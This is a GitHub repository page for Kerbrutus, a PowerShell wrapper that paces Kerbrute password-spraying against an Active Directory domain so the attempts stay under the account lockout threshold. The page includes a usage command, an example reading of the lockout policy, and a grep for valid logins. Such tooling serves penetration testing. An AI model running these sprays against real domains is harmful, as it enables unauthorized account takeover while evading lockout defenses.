Skip to content

vaarg/Kerbrutus

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

23 Commits
 
 
 
 
 
 

Repository files navigation

Usage

.\kerbrutus.ps1 -ExecutionCount 3 -TimeWindowMinutes 30 -CommandTemplate '.\kerbrute.exe passwordspray -d domain.local .\users.txt -v "<pass>"' -PasswordsFile .\passwords.txt -OutputFile results.log

In -CommandTemplate the <pass> is a place holder value that is populated by each password from the specified password list file (-PasswordsFile <pass_file>).

The value specified in -OutputFile will have all results appended to it.

Why?

So you can continuously and safely run Kerbrute (the passwordspray function) in alignment with the password policy of the AD environment you are using.

E.g.

Get-ADDefaultDomainPasswordPolicy
<SNIP>
LockoutDuration             : 00:30:00
LockoutObservationWindow    : 00:30:00
LockoutThreshold            : 5
<SNIP>

So, as the LockoutObservationWindow is 30 and the LockoutThreshold is 5, you might choose to safely spray 3 passwords (for ever domain user) within a 30 minute window (and then rinse and repeat).

So you'd set the follow as such:

-ExecutionCount 3 -TimeWindowMinutes 30

NB: Kerbrutus counts 30 minutes from when the last command finishes executing and adds 1 minute to create a buffer.

Then you can just grep all VALID LOGINs from the log file:

Select-String -Path "results.log" -Pattern "VALID LOGIN"

About

Run Kerbrute's passwordspray function safely, with a password list, and aligned with the account lockout policy of your target Active Directory domain.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

 
 
 

Contributors